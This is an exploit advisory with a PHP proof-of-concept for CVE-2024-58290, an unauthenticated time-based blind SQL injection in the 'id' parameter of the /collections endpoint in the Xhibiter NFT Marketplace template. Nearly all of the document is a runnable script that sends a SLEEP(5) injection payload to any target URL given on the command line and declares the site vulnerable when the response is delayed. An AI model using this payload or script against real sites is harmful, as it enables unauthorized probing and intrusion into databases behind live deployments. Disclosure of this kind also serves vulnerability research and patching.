Xhibiter NFT Marketplace 1.10.2 SQL Injection

Xhibiter NFT Marketplace 1.10.2 SQL Injection

=============================================================================================================================================
| # Title Xhibiter NFT Marketplace 1.10.2 SQL Injection

=============================================================================================================================================
| # Title : Xhibiter NFT Marketplace <= 1.10.2 Unauthenticated Time-Based SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://themeforest.net/item/xhibiter-nft-marketplace-html-template/36542347 |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214186/ & CVE-2024-58290

[+] Summary : A time-based blind SQL injection vulnerability exists in the "id" parameter of the /collections endpoint in Xhibiter NFT Marketplace. An unauthenticated
attacker can inject arbitrary SQL queries, leading to database interaction confirmation via delay-based payloads.


[+] Usage : php poc.php --url=http://target/xhibiter

[+] POC :

<?php


if (php_sapi_name() !== 'cli') {
die("Run this script from CLI only.\n");
}

function banner() {
echo "
##########################################################
# CVE-2024-58290 - Xhibiter SQL Injection Detector #
# PHP Poc by indoushka #
##########################################################
";
}

function checkVulnerability($baseUrl) {

$endpoint = rtrim($baseUrl, '/') . "/collections";

// Time-Based SQL Injection Payload
$payload = "1' AND (SELECT 5678 FROM (SELECT(SLEEP(5)))DwVr) AND '1'='1";

$query = http_build_query([
'id' => $payload
]);

$url = $endpoint . "?" . $query;

echo "[*] Target URL: {$endpoint}\n";
echo "[*] Testing for SQL Injection (Time-Based)...\n";

$start = microtime(true);

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);

curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);

$end = microtime(true);
$duration = $end - $start;

if ($error) {
echo "[!] CURL Error: {$error}\n";
return;
}

if ($duration >= 5) {
echo "\n[+] SUCCESS: Target is VULNERABLE to CVE-2024-58290\n";
echo "[+] Response delay: " . round($duration, 2) . " seconds\n";
echo "[+] Database executed SLEEP(5)\n";
} else {
echo "\n[-] FAILED: Target does not appear vulnerable\n";
echo "[-] Response time: " . round($duration, 2) . " seconds\n";
}
}

$options = getopt("", ["url:"]);

if (!isset($options['url'])) {
echo "Usage: php poc.php --url=http://target/xhibiter\n";
exit;
}

banner();
checkVulnerability($options['url']);


Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================